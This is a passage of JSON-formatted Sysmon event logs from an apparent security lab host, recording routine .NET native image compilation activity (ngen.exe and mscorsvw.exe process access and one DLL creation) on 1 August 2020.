osoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6960,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:38.027\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-048E-5F25-0000-0010432B0E00}\r\nTargetProcessId: 4432\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:38.027","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-048E-5F25-0000-0010432B0E00}","TargetProcessId":"4432","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6961,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:38.027\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-048E-5F25-0000-0010432B0E00}\r\nTargetProcessId: 4432\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:38.027","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-048E-5F25-0000-0010432B0E00}","TargetProcessId":"4432","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6962,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:38.152\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3800\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-048E-5F25-0000-0010CD2E0E00}\r\nTargetProcessId: 2920\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:38.152","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3800","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-048E-5F25-0000-0010CD2E0E00}","TargetProcessId":"2920","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6963,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:38.152\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-048E-5F25-0000-0010CD2E0E00}\r\nTargetProcessId: 2920\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:38.152","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-048E-5F25-0000-0010CD2E0E00}","TargetProcessId":"2920","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6964,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:38.168\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-048E-5F25-0000-0010CD2E0E00}\r\nTargetProcessId: 2920\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:38.168","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-048E-5F25-0000-0010CD2E0E00}","TargetProcessId":"2920","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":6965,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:58:38.715\r\nProcessGuid: {A837DB8D-048E-5F25-0000-0010CD2E0E00}\r\nProcessId: 2920\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\b68-0\\Microsoft.VisualBasic.Activities.Compiler.dll\r\nCreationUtcTime: 2020-08-01 05:58:38.715","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:58:38.715","ProcessGuid":"{A837DB8D-048E-5F25-0000-0010CD2E0E00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\b68-0\\Microsoft.VisualBasic.Activities.Compiler.dll","CreationUtcTime":"2020-08-01 05:58:38.715","EventReceivedTime":"2020-08-01 05:58:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6966,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:38.777\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-0489-5F25-0000-0010AE6B0D00}\r\nTargetProcessId: 2984\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:38.777","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-0489-5F25-0000-0010AE6B0D00}","TargetProcessId":"2984","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6967,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:38.777\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0489-5F25-0000-0010AE6B0D00}\r\nTargetProcessId: 2984\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:38.777","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0489-5F25-0000-0010AE6B0D00}","TargetProcessId":"2984","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6968,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:38.777\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0489-5F25-0000-0010AE6B0D00}\r\nTargetProcessId: 2984\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 